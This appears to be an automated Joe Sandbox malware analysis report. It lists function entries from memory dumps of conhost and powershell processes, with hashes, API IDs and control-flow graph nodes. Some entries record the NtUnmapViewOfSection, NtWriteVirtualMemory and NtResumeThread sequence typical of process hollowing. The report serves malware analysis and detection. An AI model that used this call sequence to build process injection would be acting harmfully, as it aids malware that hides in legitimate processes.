                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 52911a3a8d5b5ee48a87a1b78c4c6386f65aab5c6f3d5bcbf83e3c48883794f1
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 32D1EE33714AA08AE754CFA6E4482DE37B1F346B98F408217DE4DA7B9ADE34C00AC741
                                            Function 000002A5AF3614A0 Relevance: 6.3, APIs: 5, Instructions: 40memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: ab0fcc66d7d40f7514759323c1552dd0bf716da8e4a32a793299546413c229a3
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 5C015732711EA0DAEB58EF66A80814A77A0F78AF81B094127DB4A43B29DF38D055C740
                                            Function 000002A5AF3728F4 Relevance: 6.2, APIs: 4, Instructions: 229COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A5AF3728DF), ref: 000002A5AF372A12
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ConsoleMode
                                            • String ID:
                                            • API String ID: 4145635619-0
                                            • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction ID: 5acf61a40a10063d8b8c33adbbb132806e8fb0224878c91b87f0d2ea6da8ea87
                                            • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                                            • Instruction Fuzzy Hash: A591C833710E618BF758DF65A4587AE3BA0F356B98F448207DE4A57A86DF34C449CB02
                                            Function 000002A5AF368090 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                            • String ID:
                                            • API String ID: 2933794660-0
                                            • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction ID: a82012280eccb9f073b5079c7b0689b4e8b15b4bfc755422736fd43ed4942e3b
                                            • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                                            • Instruction Fuzzy Hash: 1E112A66711F148AEB44CF60F8583AA33A4F71A758F440E22DA6D877A9DF78C1588381
                                            Function 000002A5AF3627E8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction ID: bd13ccdca84b03b02780847077ca1ded3aa34e4e026eb5695dd21320b8955053
                                            • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                                            • Instruction Fuzzy Hash: B5718127710FA183EBB89F26F8583ABA794F386B84F454217DD4943B8ADE74C508C741
                                            Function 000002A5AF3380A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 154COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritable__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 3242871069-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 431b515f25e7c6b4bace6a3a5830577b2c82f6e8d7bc1852fbac1a2b30461109
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: BC51B23B711E208BDB58CB19F448B6E3391E345B98F158727EA468778ADFB8C849C701
                                            Function 000002A5AF339AFC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: CallTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3163161869-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: 3bf4a73daa7b797210bf1d27d02c50de8838503af5c35638a843d95e2410b488
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: 62616B33609BC4C2EB64DB19F44539AB7A1F786B88F044316EB9907B96CF78D198CB01
                                            Function 000002A5AF3625DC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileType
                                            • String ID: \\.\pipe\
                                            • API String ID: 3081899298-91387939
                                            • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction ID: 536e5c3af9786f9e5e3c3f01a9d2c01ebec96ba7f9275afef641aa95469c2408
                                            • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                                            • Instruction Fuzzy Hash: D051B427304BA187EBAC9F25B45C7AFA651F397780F468227CD5943B4BDE35C4088741
                                            Function 000002A5AF372660 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite
                                            • String ID: U
                                            • API String ID: 442123175-4171548499
                                            • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction ID: 31b3f6641160006f2bf41c585b46778b1eedb991293f6485929de116cba04e72
                                            • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
                                            • Instruction Fuzzy Hash: 4441C263715A9087E754CF25F44879BB7A0F34A784F804223EA4D87B59EF78C449CB41
                                            Function 000002A5AF369178 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: ExceptionFileHeaderRaise
                                            • String ID: csm
                                            • API String ID: 2573137834-1018135373
                                            • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction ID: ae8dfc81d5688e7c6396316f0a3d6c7474d4efdd5398251647dcb6ef88820bf7
                                            • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
                                            • Instruction Fuzzy Hash: 7B115B32315F9082EB688B15F84834AB7E1F789B84F684222EE8D07B69DF3CC555CB00
                                            Function 000002A5AF361D30 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocFree
                                            • String ID:
                                            • API String ID: 756756679-0
                                            • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction ID: b2719ea17ed0a135b16bbfcf844ee6686936b077b3cb979131d2b203a7f19b67
                                            • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
                                            • Instruction Fuzzy Hash: 5F115E22701F9086EB58DB66B40815B77B0F789FD1F584226DF4E5376ADF38D4468300
                                            Function 000002A5AF361264 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction ID: 84c2f324b7f5c78be68e7115a67433384288e31ad71e789ecd7c6c1a19955391
                                            • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
                                            • Instruction Fuzzy Hash: B0E03932702A149BEB5CCB62E80834A36E1EB89B26F448126C90907355EF7D949DA741
                                            Function 000002A5AF361000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcess
                                            • String ID:
                                            • API String ID: 1617791916-0
                                            • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction ID: 20765164b1318a20aaa7dd8b179a37ba5adbeae8587c6dfd509d8823a760eb7c
                                            • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
                                            • Instruction Fuzzy Hash: 4FE06D727129149BEB5CCB22E80824A33E1FB89B22F448122C90907714EE3C949CA611

                                            Executed Functions

                                            Function 04DFD01D Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000020.00000002.2748625085.0000000004DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_32_2_4dfd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 875db052c33f4cb95b9b4501e9f5ffa8e2bd911345a84c3d5fc34e7a796df31f
                                            • Instruction ID: 1106bdb23add92245a50c13f3757bdb31ce8bad43e88baeefed0353df7836432
                                            • Opcode Fuzzy Hash: 875db052c33f4cb95b9b4501e9f5ffa8e2bd911345a84c3d5fc34e7a796df31f
                                            • Instruction Fuzzy Hash: 0C012B71604340DAE7304E25ED84B67BF98EF41364F18C11ADF4A4F142C7B8E441C6B1
                                            Function 04DFD005 Relevance: .0, Instructions: 45COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000020.00000002.2748625085.0000000004DFD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DFD000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_32_2_4dfd000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 3e125b7204577ed84621df69a71422e49a9849c341bb841d644149dd7c288a54
                                            • Instruction ID: c3a1d045317d99a6e96de1be091b03154fef262ce33046615d263dd2f39a1d22
                                            • Opcode Fuzzy Hash: 3e125b7204577ed84621df69a71422e49a9849c341bb841d644149dd7c288a54
                                            • Instruction Fuzzy Hash: A1014C6250E3C09EE7128B259D94B52BFB4EF43224F19C1DBDD888F1A3C2695849C7B2

                                            Execution Graph

                                            Execution Coverage:7.6%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:42.9%
                                            Total number of Nodes:28
                                            Total number of Limit Nodes:0

                                            Executed Functions

                                            Function 00007FFD343F0C7D Relevance: 1.6, APIs: 1, Instructions: 129nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1082 7ffd343f0c7d-7ffd343f0c89 1083 7ffd343f0c8b-7ffd343f0c93 1082->1083 1084 7ffd343f0c94-7ffd343f0d08 1082->1084 1083->1084 1088 7ffd343f0d0a-7ffd343f0d0f 1084->1088 1089 7ffd343f0d12-7ffd343f0d55 NtWriteVirtualMemory 1084->1089 1088->1089 1090 7ffd343f0d57 1089->1090 1091 7ffd343f0d5d-7ffd343f0d7a 1089->1091 1090->1091
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryVirtualWrite
                                            • String ID:
                                            • API String ID: 3527976591-0
                                            • Opcode ID: 0b29ae9c529ab447b690b42c1f866b09a9bb65fde65f26664db2805ae73e4fde
                                            • Instruction ID: 60a5e16088e0e038abdd3e2a1f1298002086c7af00f64b6ed70bee2ca4ea6820
                                            • Opcode Fuzzy Hash: 0b29ae9c529ab447b690b42c1f866b09a9bb65fde65f26664db2805ae73e4fde
                                            • Instruction Fuzzy Hash: 7331A23190CA4C8FDB18EF5C9885AE9BBF0FF5A321F04426ED049D3652DB74A806CB85
                                            Function 00007FFD343EE098 Relevance: 1.6, APIs: 1, Instructions: 122nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1092 7ffd343ee098-7ffd343f0b28 NtUnmapViewOfSection 1103 7ffd343f0b2a 1092->1103 1104 7ffd343f0b30-7ffd343f0b4c 1092->1104 1103->1104
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 84bb68df6dec345b87bb105aece335564ea3fe37cdee40174e10d0cf26906a35
                                            • Instruction ID: 64eda66556fe047d5c6451425c4e638ab86487b6f2406ea6c905157b33ccce86
                                            • Opcode Fuzzy Hash: 84bb68df6dec345b87bb105aece335564ea3fe37cdee40174e10d0cf26906a35
                                            • Instruction Fuzzy Hash: 97314472A0DA488FEB58DF5C9C5A6BA7BF0EBA6320F08406FD049D3152DA34A845C751
                                            Function 00007FFD343EE0FA Relevance: 1.6, APIs: 1, Instructions: 120nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1105 7ffd343ee0fa-7ffd343f0d08 1109 7ffd343f0d0a-7ffd343f0d0f 1105->1109 1110 7ffd343f0d12-7ffd343f0d55 NtWriteVirtualMemory 1105->1110 1109->1110 1111 7ffd343f0d57 1110->1111 1112 7ffd343f0d5d-7ffd343f0d7a 1110->1112 1111->1112
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: MemoryVirtualWrite
                                            • String ID:
                                            • API String ID: 3527976591-0
                                            • Opcode ID: c094f808c037d31b5d20e1ed7a6e70b025586da0cd87c71aaf0b3792231bd758
                                            • Instruction ID: 4cc1995a78c945e8af671a77df225b55bc5a731890720447ffa340a60ed70bbd
                                            • Opcode Fuzzy Hash: c094f808c037d31b5d20e1ed7a6e70b025586da0cd87c71aaf0b3792231bd758
                                            • Instruction Fuzzy Hash: 1831A27190CA1C8FDB58EF5CD845AF9BBF0FB59311F00422ED04AD3252CB74A8068B85
                                            Function 00007FFD343EE0A8 Relevance: 1.6, APIs: 1, Instructions: 117nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1113 7ffd343ee0a8-7ffd343f0b28 NtUnmapViewOfSection 1123 7ffd343f0b2a 1113->1123 1124 7ffd343f0b30-7ffd343f0b4c 1113->1124 1123->1124
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 6427f0a1e4414fa63f8539699452f425b45a523136b24a674c96e68ab62bfb46
                                            • Instruction ID: 287f36019c2ec2fa2ce7a9fb4b56f88d82efd0c67da839dcfdd28d9ee3a543c5
                                            • Opcode Fuzzy Hash: 6427f0a1e4414fa63f8539699452f425b45a523136b24a674c96e68ab62bfb46
                                            • Instruction Fuzzy Hash: DB313632A0DB488FEB58DF5C8C4A7B97BF0EBA6320F04416FD049D3152DA34A845C751
                                            Function 00007FFD343F0A5E Relevance: 1.6, APIs: 1, Instructions: 116nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1125 7ffd343f0a5e-7ffd343f0a6b 1126 7ffd343f0a76-7ffd343f0b28 NtUnmapViewOfSection 1125->1126 1127 7ffd343f0a6d-7ffd343f0a75 1125->1127 1131 7ffd343f0b2a 1126->1131 1132 7ffd343f0b30-7ffd343f0b4c 1126->1132 1127->1126 1131->1132
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: SectionUnmapView
                                            • String ID:
                                            • API String ID: 498011366-0
                                            • Opcode ID: 38fc070d5a908509e948cefaf4443a53e06a2dcd49e8a51e53b98db855bf7802
                                            • Instruction ID: 4dc0a54d941e7bf4ea81884a8bf23bc1c74465e80b838c6a323f58394a9c774e
                                            • Opcode Fuzzy Hash: 38fc070d5a908509e948cefaf4443a53e06a2dcd49e8a51e53b98db855bf7802
                                            • Instruction Fuzzy Hash: 4231E73160C7888FDB55DB6888557E97FF0EF57320F04419BD049D7193D674A845CB92
                                            Function 00007FFD343F1004 Relevance: 1.6, APIs: 1, Instructions: 114nativethreadCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 1133 7ffd343f1004-7ffd343f100b 1134 7ffd343f1016-7ffd343f10c2 NtResumeThread 1133->1134 1135 7ffd343f100d-7ffd343f1015 1133->1135 1139 7ffd343f10ca-7ffd343f10e6 1134->1139 1140 7ffd343f10c4 1134->1140 1135->1134 1140->1139
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
                                            • Opcode ID: bdfa301e91d9450051c6975da739ecd7c3d45f7014dae6de278f97e8154a02a8
                                            • Instruction ID: fc1d9f664102523a645091e2f8810900d950df4c54e0126e48f682a4583a31d4
                                            • Opcode Fuzzy Hash: bdfa301e91d9450051c6975da739ecd7c3d45f7014dae6de278f97e8154a02a8
                                            • Instruction Fuzzy Hash: 9331C131A0CA5C8FDB58EB98D8867E9BBE1EF56320F04416BD409D3252DA74A846CB91
                                            Function 00007FFD343EE0C8 Relevance: 1.6, APIs: 1, Instructions: 102nativeCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
